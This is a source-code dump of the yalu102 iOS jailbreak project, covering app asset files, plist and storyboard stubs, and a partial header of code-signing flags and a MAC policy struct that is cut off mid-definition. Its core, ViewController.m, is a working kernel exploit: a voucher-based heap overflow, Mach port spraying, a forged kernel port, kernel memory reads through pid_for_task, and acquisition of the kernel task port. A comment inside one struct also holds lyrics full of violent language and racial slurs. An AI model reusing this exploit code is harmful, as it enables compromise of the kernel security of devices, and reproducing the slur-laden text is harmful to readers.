https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "AppIcon40x40~ipad-2.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "AppIcon60x60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "AppIcon40x40@2x~ipadsptl.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "AppIcon40x40@2x~ipadsptl3.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "AppIcon40x40@2x~ipad-1.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "AppIcon40x40@3x~iphone.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "AppIcon60x60@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "AppIcon60x60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "AppIcon40x40@2x~ipadnotif.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "AppIcon40x40~ipad-1.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "AppIcon40x40@2x~ipadsptlsmal.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "AppIcon40x40@2x~ipadsptl-1.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "AppIcon40x40~ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "AppIcon40x40@2x~ipad.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "AppIcon60x60~ipad.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "AppIcon60x60@2x~ipad.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "AppIcon60x60@2x~ipadpro.png", 103 | "scale" : "2x" 104 | } 105 | ], 106 | "info" : { 107 | "version" : 1, 108 | "author" : "xcode" 109 | } 110 | } -------------------------------------------------------------------------------- /SourceCode/yalu102/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /SourceCode/yalu102/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 39 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /SourceCode/yalu102/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /SourceCode/yalu102/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | { 13 | IBOutlet UIButton* dope; 14 | } 15 | - (IBAction)yolo:(id)sender; 16 | 17 | @end 18 | 19 | -------------------------------------------------------------------------------- /SourceCode/yalu102/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "offsets.h" 10 | #import "ViewController.h" 11 | #import 12 | #import 13 | #import 14 | #undef __IPHONE_OS_VERSION_MIN_REQUIRED 15 | #import 16 | #include 17 | 18 | extern uint64_t procoff; 19 | 20 | typedef struct { 21 | mach_msg_header_t head; 22 | mach_msg_body_t msgh_body; 23 | mach_msg_ool_ports_descriptor_t desc[256]; 24 | char pad[4096]; 25 | } sprz; 26 | 27 | @interface ViewController () 28 | 29 | @end 30 | 31 | @implementation ViewController 32 | 33 | - (void)viewDidLoad { 34 | [super viewDidLoad]; 35 | init_offsets(); 36 | struct utsname u = { 0 }; 37 | uname(&u); 38 | 39 | 40 | if (strstr(u.version, "MarijuanARM")) { 41 | [dope setEnabled:NO]; 42 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 43 | } 44 | 45 | // Do any additional setup after loading the view, typically from a nib. 46 | } 47 | 48 | typedef natural_t not_natural_t; 49 | 50 | struct not_essers_ipc_object { 51 | not_natural_t io_bits; 52 | not_natural_t io_references; 53 | char io_lock_data[1337]; 54 | /* 55 | 56 | https://www.youtube.com/watch?v=ZADJ8S1qH3U 57 | 58 | 59 | [Intro] 60 | Lets get it 61 | Steve Drive 62 | R.I.P L'A Capone 63 | OTF 64 | These nigga's steady woofing like they want beef, want beef? 65 | You want smoke? You want smoke? Just tell me 66 | 67 | [Hook] 68 | These niggas steady woofing like they want beef, want beef?[You want smoke?] 69 | I can make that happen if you want beef, you want beef?[You want smoke?] 70 | Catch you while you're capping with this semi, semi 71 | Put the semi-automatic to your kidney, kidney 72 | 73 | [Verse 1] 74 | Put the semi-automatic to your kidney, kidney 75 | I'm off the dope I got the pole you talking tough you getting smoked 76 | These nigga's steady woofing like they want beef, but I really know 77 | Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show 78 | I'm off Tu pack saying fuck Jojo[Fuck Jojo] 79 | Talking shit get your life took no joke 80 | I'm with my nigga's and my niggas ain't no joke 81 | And if you got that fucking bag then you getting poked 82 | And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] 83 | Me and Durk finna spaz, and I put that on the guys, it's homicides 84 | Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized 85 | And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] 86 | I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] 87 | I'm getting tree tree[Getting dope], getting top from a bitch named Kiki 88 | 89 | [Chorus] 90 | 91 | [Verse 2] 92 | And if you really want smoke[You want smoke little nigga?] 93 | I will give your ass smoke[Give your ass smoke little nigga?] 94 | This Glock 9 bitch I tote, and I will put it to your throat 95 | I'm off this Tooka pack and no L'A, I'ma go crazy 96 | You supposed to be my nigga but actin' like a fan that’s crazy 97 | What the fuck wrong with these nigga's, they fugazi 98 | I made this song for the niggas, cause they crazy 99 | Separate me from them niggas[Separate Rondo] 100 | Pull up on your block, with the mops 101 | Then I hit the dip and put him up in case of attempts[Incase a nigga survive] 102 | But we don't make throws, we shoot like Pimp[We shoot to kill] 103 | I got 23[Two three] So i don't fucking speak[I don't speak] 104 | Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] 105 | Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch 106 | 107 | [Chorus] 108 | */ 109 | 110 | }; 111 | 112 | 113 | 114 | #define IO_BITS_ACTIVE 0x80000000 115 | #define IKOT_TASK 2 116 | #define IKOT_IOKIT_CONNECT 29 117 | #define IKOT_CLOCK 25 118 | 119 | char dt[128]; 120 | - (IBAction)yolo:(UIButton*)sender 121 | { 122 | /* 123 | 124 | we out here! 125 | 126 | */ 127 | 128 | mach_port_t vch = 0; 129 | 130 | mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); 131 | data->content_size = 0; 132 | data->key=MACH_VOUCHER_ATTR_KEY_BANK; 133 | data->command=610; 134 | data->previous_voucher=MACH_PORT_NULL; 135 | 136 | kern_return_t lol = host_create_mach_voucher(mach_host_self(), data, sizeof(mach_voucher_attr_recipe_data_t), &vch); 137 | 138 | assert(lol==0 && vch!=0); 139 | 140 | 141 | unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 142 | unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); 143 | assert(fdata == odata + 0x4000); 144 | memset(odata, 0x42, 0x0); 145 | 146 | 147 | uint64_t rsz = 0x100; // alloc size; 148 | fdata -= rsz + 0x100; // overflow full chunk 149 | 150 | struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); 151 | 152 | mlock(fakeport, 0x8000); 153 | 154 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; 155 | fakeport->io_lock_data[12] = 0x11; 156 | 157 | *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; 158 | 159 | 160 | mach_port_t* ports = calloc(800, sizeof(mach_port_t)); 161 | 162 | for (int i = 0; i < 800; i++) { 163 | mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 164 | mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); 165 | } 166 | sprz msg1; 167 | 168 | memset(&msg1, 0, sizeof(sprz)); 169 | sprz msg2; 170 | 171 | memset(&msg2, 0, sizeof(sprz)); 172 | msg1.msgh_body.msgh_descriptor_count = 128; 173 | 174 | msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; 175 | msg1.head.msgh_local_port = MACH_PORT_NULL; 176 | msg1.head.msgh_size = sizeof(msg1)-2048; 177 | 178 | mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); 179 | for (int i = 0; i < 0x1000; i++) { 180 | buffer[i] = MACH_PORT_DEAD; 181 | } 182 | 183 | for (int i = 0; i < 256; i++) { 184 | msg1.desc[i].address = buffer; 185 | msg1.desc[i].count = 0x100/8; 186 | msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; 187 | msg1.desc[i].disposition = 19; 188 | } 189 | 190 | pthread_yield_np(); 191 | for (int i=1; i<300; i++) { 192 | msg1.head.msgh_remote_port = ports[i]; 193 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 194 | assert(kret==0); 195 | } 196 | 197 | pthread_yield_np(); 198 | for (int i=500; i<800; i++) { 199 | msg1.head.msgh_remote_port = ports[i]; 200 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 201 | assert(kret==0); 202 | } 203 | 204 | pthread_yield_np(); 205 | for (int i=300; i<500; i++) { 206 | msg1.head.msgh_remote_port = ports[i]; 207 | if (i%4 == 0) { 208 | msg1.msgh_body.msgh_descriptor_count = 1; 209 | } else { 210 | msg1.msgh_body.msgh_descriptor_count = 256; 211 | } 212 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 213 | assert(kret==0); 214 | } 215 | 216 | pthread_yield_np(); 217 | for (int i = 300; i<500; i+=4) { 218 | msg2.head.msgh_local_port = ports[i]; 219 | kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 220 | if(!(i < 380)) 221 | ports[i] = 0; 222 | assert(kret==0); 223 | } 224 | for (int i = 300; i<380; i+=4) { 225 | msg1.head.msgh_remote_port = ports[i]; 226 | msg1.msgh_body.msgh_descriptor_count = 1; 227 | kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); 228 | assert(kret==0); 229 | } 230 | 231 | mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); 232 | mach_port_t foundport = 0; 233 | for (int i=1; i<500; i++) { 234 | if (ports[i]) { 235 | msg1.head.msgh_local_port = ports[i]; 236 | pthread_yield_np(); 237 | kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); 238 | assert(kret==0); 239 | for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { 240 | mach_port_t* ptz = msg1.desc[k].address; 241 | for (int z = 0; z < 0x100/8; z++) { 242 | if (ptz[z] != MACH_PORT_DEAD) { 243 | if (ptz[z]) { 244 | foundport = ptz[z]; 245 | goto foundp; 246 | } 247 | 248 | } 249 | } 250 | } 251 | mach_msg_destroy(&msg1.head); 252 | mach_port_deallocate(mach_task_self(), ports[i]); 253 | ports[i] = 0; 254 | } 255 | } 256 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 257 | return; 258 | 259 | foundp: 260 | NSLog(@"found corruption %x", foundport); 261 | 262 | uint64_t textbase = 0xfffffff007004000; 263 | 264 | for (int i = 0; i < 0x300; i++) { 265 | for (int k = 0; k < 0x40000; k+=8) { 266 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; 267 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 268 | 269 | kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); 270 | 271 | if (kret != KERN_FAILURE) { 272 | goto gotclock; 273 | } 274 | } 275 | } 276 | [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; 277 | return; 278 | 279 | gotclock:; 280 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 281 | 282 | leaked_ptr &= ~0x3FFF; 283 | 284 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 285 | fakeport->io_references = 0xff; 286 | char* faketask = ((char*)fakeport) + 0x1000; 287 | 288 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 289 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 290 | *(uint64_t*) (faketask + 0x10) = 0xee; 291 | 292 | while (1) { 293 | int32_t leaked = 0; 294 | *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; 295 | pid_for_task(foundport, &leaked); 296 | if (leaked == MH_MAGIC_64) { 297 | NSLog(@"found kernel text at %llx", leaked_ptr); 298 | break; 299 | } 300 | leaked_ptr -= 0x4000; 301 | } 302 | 303 | uint64_t kernel_base = leaked_ptr; 304 | 305 | uint64_t allproc = allproc_offset + kernel_base; 306 | 307 | uint64_t proc_ = allproc; 308 | 309 | uint64_t myproc = 0; 310 | uint64_t kernproc = 0; 311 | 312 | while (proc_) { 313 | uint64_t proc = 0; 314 | 315 | *(uint64_t*) (faketask + procoff) = proc_ - 0x10; 316 | pid_for_task(foundport, (int32_t*)&proc); 317 | *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; 318 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); 319 | 320 | int pd = 0; 321 | *(uint64_t*) (faketask + procoff) = proc; 322 | pid_for_task(foundport, &pd); 323 | 324 | if (pd == getpid()) { 325 | myproc = proc; 326 | } else if (pd == 0){ 327 | kernproc = proc; 328 | } 329 | proc_ = proc; 330 | } 331 | 332 | 333 | uint64_t kern_task = 0; 334 | *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; 335 | pid_for_task(foundport, (int32_t*)&kern_task); 336 | *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; 337 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); 338 | 339 | uint64_t itk_kern_sself = 0; 340 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; 341 | pid_for_task(foundport, (int32_t*)&itk_kern_sself); 342 | *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; 343 | pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 344 | 345 | char* faketaskport = malloc(0x1000); 346 | char* ktaskdump = malloc(0x1000); 347 | 348 | for (int i = 0; i < 0x1000/4; i++) { 349 | *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; 350 | pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); 351 | } 352 | for (int i = 0; i < 0x1000/4; i++) { 353 | *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; 354 | pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); 355 | } 356 | 357 | memcpy(fakeport, faketaskport, 0x1000); 358 | memcpy(faketask, ktaskdump, 0x1000); 359 | 360 | mach_port_t pt = 0; 361 | 362 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 363 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 364 | 365 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; 366 | 367 | task_get_special_port(foundport, 4, &pt); // get tfp0 368 | NSLog(@"got tfp0 -> %x", pt); 369 | fakeport->io_bits = 0; 370 | 371 | extern uint64_t slide; 372 | slide = kernel_base - 0xFFFFFFF007004000; 373 | 374 | void exploit(void*, mach_port_t, uint64_t, uint64_t); 375 | exploit(sender, pt, kernel_base, allproc_offset); 376 | [dope setEnabled:NO]; 377 | [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; 378 | 379 | } 380 | 381 | - (void)didReceiveMemoryWarning { 382 | [super didReceiveMemoryWarning]; 383 | // Dispose of any resources that can be recreated. 384 | } 385 | 386 | 387 | @end 388 | -------------------------------------------------------------------------------- /SourceCode/yalu102/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/bootstrap.tar -------------------------------------------------------------------------------- /SourceCode/yalu102/devicesupport.h: -------------------------------------------------------------------------------- 1 | #ifndef devicesupport_h 2 | #define devicesupport_h 3 | 4 | 5 | 6 | //0xFFFFFFF0075F6000+0x50 (0xfffffff006e4d620+0x4bc0) 7 | 8 | #define G(type) constget(type) 9 | #define S(type, val) constset(type,val) 10 | 11 | #define CS_VALID 0x0000001 /* dynamically valid */ 12 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 13 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 14 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 15 | 16 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 17 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 18 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 19 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 20 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 21 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 22 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 23 | 24 | #define CS_ALLOWED_MACHO 0x00ffffe 25 | 26 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 27 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 28 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 29 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 30 | 31 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 32 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 33 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 34 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 35 | 36 | uint64_t constget(int idx); 37 | #import 38 | struct mac_policy_ops{ 39 | uint64_t mpo_audit_check_postselect; 40 | uint64_t mpo_audit_check_preselect; 41 | uint64_t mpo_bpfdesc_label_associate; 42 | uint64_t mpo_bpfdesc_label_destroy; 43 | uint64_t mpo_bpfdesc_label_init; 44 | uint64_t mpo_bpfdesc_check_receive; 45 | uint64_t mpo_cred_check_label_update_execve; 46 | uint64_t mpo_cred_check_label_update; 47 | uint64_t mpo_cred_check_visible; 48 | uint64_t mpo_cred_label_associate_fork; 49 | uint64_t mpo_cred_label_associate_kernel; 50 | uint64_t mpo_cred_label_associate; 51 | uint64_t mpo_cred_label_associate_user; 52 | uint64_t mpo_cred_label_destroy; 53 | uint64_t mpo_cred_label_externalize_audit; 54 | uint64_t mpo_cred_label_externalize; 55 | uint64_t mpo_cred_label_init; 56 | uint64_t mpo_cred_label_internalize; 57 | uint64_t mpo_cred_label_update_execve; 58 | uint64_t mpo_cred_label_update; 59 | uint64_t mpo_devfs_label_associate_device; 60 | uint64_t mpo_devfs_label_associate_directory; 61 | uint64_t mpo_devfs_label_copy; 62 | uint64_t mpo_devfs_label_destroy; 63 | uint64_t mpo_devfs_label_init; 64 | uint64_t mpo_devfs_label_update; 65 | uint64_t mpo_file_check_change_offset; 66 | uint64_t mpo_file_check_create; 67 | uint64_t mpo_file_check_dup; 68 | uint64_t mpo_file_check_fcntl; 69 | uint64_t mpo_file_check_get_offset; 70 | uint64_t mpo_file_check_get; 71 | uint64_t mpo_file_check_inherit; 72 | uint64_t mpo_file_check_ioctl; 73 | uint64_t mpo_file_check_lock; 74 | uint64_t mpo_file_check_mmap_downgrade; 75 | uint64_t mpo_file_check_mmap; 76 | uint64_t mpo_file_check_receive; 77 | uint64_t mpo_file_check_set; 78 | uint64_t mpo_file_label_init; 79 | uint64_t mpo_file_label_destroy; 80 | uint64_t mpo_file_label_associate; 81 | uint64_t mpo_ifnet_check_label_update; 82 | uint64_t mpo_ifnet_check_transmit; 83 | uint64_t mpo_ifnet_label_associate; 84 | uint64_t mpo_ifnet_label_copy; 85 | uint64_t mpo_ifnet_label_destroy; 86 | uint64_t mpo_ifnet_label_externalize; 87 | uint64_t mpo_ifnet_label_init; 88 | uint64_t mpo_ifnet_label_internalize; 89 | uint64_t mpo_ifnet_label_update; 90 | uint64_t mpo_ifnet_label_recycle; 91 | uint64_t mpo_inpcb_check_deliver; 92 | uint64_t mpo_inpcb_label_associate; 93 | uint64_t mpo_inpcb_label_destroy; 94 | uint64_t mpo_inpcb_label_init; 95 | uint64_t mpo_inpcb_label_recycle; 96 | uint64_t mpo_inpcb_label_update; 97 | uint64_t mpo_iokit_check_device; 98 | uint64_t mpo_ipq_label_associate; 99 | uint64_t mpo_ipq_label_compare; 100 | uint64_t mpo_ipq_label_destroy; 101 | uint64_t mpo_ipq_label_init; 102 | uint64_t mpo_ipq_label_update; 103 | uint64_t mpo_file_check_library_validation; 104 | uint64_t mpo_vnode_notify_setacl; 105 | uint64_t mpo_vnode_notify_setattrlist; 106 | uint64_t mpo_vnode_notify_setextattr; 107 | uint64_t mpo_vnode_notify_setflags; 108 | uint64_t mpo_vnode_notify_setmode; 109 | uint64_t mpo_vnode_notify_setowner; 110 | uint64_t mpo_vnode_notify_setutimes; 111 | uint64_t mpo_vnode_notify_truncate; 112 | uint64_t mpo_mbuf_label_associate_bpfdesc; 113 | uint64_t mpo_mbuf_label_associate_ifnet; 114 | uint64_t mpo_mbuf_label_associate_inpcb; 115 | uint64_t mpo_mbuf_label_associate_ipq; 116 | uint64_t mpo_mbuf_label_associate_linklayer; 117 | uint64_t mpo_mbuf_label_associate_multicast_encap; 118 | uint64_t mpo_mbuf_label_associate_netlayer; 119 | uint64_t mpo_mbuf_label_associate_socket; 120 | uint64_t mpo_mbuf_label_copy; 121 | uint64_t mpo_mbuf_label_destroy; 122 | uint64_t mpo_mbuf_label_init; 123 | uint64_t mpo_mount_check_fsctl; 124 | uint64_t mpo_mount_check_getattr; 125 | uint64_t mpo_mount_check_label_update; 126 | uint64_t mpo_mount_check_mount; 127 | uint64_t mpo_mount_check_remount; 128 | uint64_t mpo_mount_check_setattr; 129 | uint64_t mpo_mount_check_stat; 130 | uint64_t mpo_mount_check_umount; 131 | uint64_t mpo_mount_label_associate; 132 | uint64_t 